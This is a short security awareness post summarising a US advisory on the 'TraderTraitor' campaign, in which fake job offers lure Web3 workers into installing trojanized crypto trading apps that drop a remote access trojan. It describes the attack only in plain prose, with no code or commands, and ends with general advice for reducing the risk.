In early 2022, a joint Cybersecurity Advisory was issued from US agencies highlighting a cyber threat dubbed "TraderTraitor", which was launched by certain state-sponsored hacker groups. The groups have targeted multiple organizations within the Web3 industry. The group focuses on all things crypto, including centralized exchanges, DeFi protocols, play-to-earn games, trading companies, VC's, and large individual accounts. Using social engineering tactics, members of the group encourage victims to download trojanized cryptocurrency applications on Windows or macOS, exploiting security gaps to steal their private keys and initiate malicious on-chain transactions.
These attacks often begin with specific messages targeting employees of Web3 companies, particularly those in system administration, software development, or IT operations (DevOps). The messages usually mimic recruitment efforts, offering high-paying jobs to lure recipients into downloading malware-laced cryptocurrency applications, referred to by law enforcement as "TraderTraitor." These malicious applications are written using cross-platform JS code, based on various open-source projects. They typically claim to be crypto trading or price prediction tools, and their campaigns feature modern, well-designed websites advertising the innovative features and reward systems.
Below is a screenshot taken from one of the malicious sites.
Mechanism of attack:
The fake software has some code which looks like a helpful update, but is actually designed to infiltrate the victims' accounts. When this update is triggered, it communicates with an external server and receives some encrypted data. The update then decrypts this data and saves it as a file on the user's computer.
Once the file is saved, the software runs this file, which contains a malicious program known as a remote access trojan (RAT). This RAT can collect information from the user's computer, execute commands, and download additional harmful files. The attackers behind this malicious software adapt their actions to each victim's environment, sometimes completing their objectives within a week of the initial intrusion.
Several examples of malicious products:
TokenAIS - Poses as an AI based trading platform
CryptAIS - Poses as an AI based trading platform
Esilet - A project promising live cryptocurrency prices and price predictions
CreAIDeck - A project which pretending to provide "Artificial Intelligence and Deep Learning"
Steps to minimize risk of attack:
Keep your operating systems up-to-date with the latest verified security fixes
Protect all of your accounts and device access with strong passwords and multi-factor authentication.
Learn to recognize common scams and phishing attempts (the Web3 space is full of them!)
Always scan email attachments
Use antivirus software on mobile devices
Only download files from trusted sources
Allow only approved applications to run on computers
Have a plan in place (in case you get exploited) and if so, report any incidents to both national and local authorities
Questions, comments, concerns? Feel free to reach out in the live chat!